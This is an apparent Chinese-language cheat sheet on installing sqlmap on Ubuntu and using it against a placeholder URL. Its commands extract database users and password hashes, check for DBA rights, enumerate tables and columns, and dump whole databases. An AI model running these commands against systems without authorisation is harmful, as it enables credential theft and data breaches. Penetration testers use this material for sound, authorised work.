buntu 通过 apt-get install 安装的sqlmap版本为 0.6
我们通过svn 来安装 为 最新 1.0版
sudo svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev
安装的位置为:/home/当前用户/sqlmap-dev/sqlmap.py
直接执行 /home/当前用户/sqlmap-dev/sqlmap.py --version
这样很不方便 我们可以设置 .bashrc 文件
sudo vim /home/当前用户/.bashrc
#任意位置加上:
alias sqlmap='python /home/seclab/sqlmap-dev/sqlmap.py'
该环境变量只对当前用户有效
*******如果想对所有用户有效 可设置全局 编辑下面的文件*******
vim /etc/profile
同样加上:
alias sqlmap='python /home/seclab/sqlmap-dev/sqlmap.py'
*******************************************************************************************************
*******更详细的信息*******
./sqlmap.py -u "URL" -v 5
*******指定数据库,绕过SQLMAP的自动检测*******
./sqlmap.py -u "URL" -v 2 --dbms "MySQL"
* MySQL
* Oracle
* PostgreSQL
* Microsoft SQL Server
*******指定操作系统,绕过SQLMAP自动检测*******
./sqlmap.py -u "URL" -v 2 --os "Linux"
* Linux
* Windows
*******判断当前用户是否是dba*******
./sqlmap.py -u "URL" --is-dba -v 1
*******列举数据库用户*******
./sqlmap.py -u "URL" --users -v 0
*******列举数据库用户密码*******
./sqlmap.py -u "URL" --passwords -v 0
./sqlmap.py -u "URL" --passwords -U sa -v 0
*******查看用户权限*******
./sqlmap.py -u "URL" --privileges -v 0
./sqlmap.py -u "URL" --privileges -U postgres -v 0
*******数据库*******
./sqlmap.py -u "URL" --dbs -v 0
*******选择 -D 使用指定数据库名称*******
./sqlmap.py -u "URL" --tables -D "information_schema"
*******列出指定数据库指定表的列名*******
./sqlmap.py -u "URL" --columns -T 表名 -D 数据库名字 -v 1
*******列出指定数据库的指定表的指定列的内容*******
./sqlmap.py -u "URL" --dump -T 表名 -D 指定库 -C 列名 -v 0
*******指定库的表段*******
./sqlmap.py -u "URL" -D 指定数据库 --columns
*******脱指定库*******
./sqlmap.py -u "URL" -D 指定数据库 --dump -v 0
*******导出所有数据库,所有表的内容*******
./sqlmap.py -u "URL" --dump-all -v 0
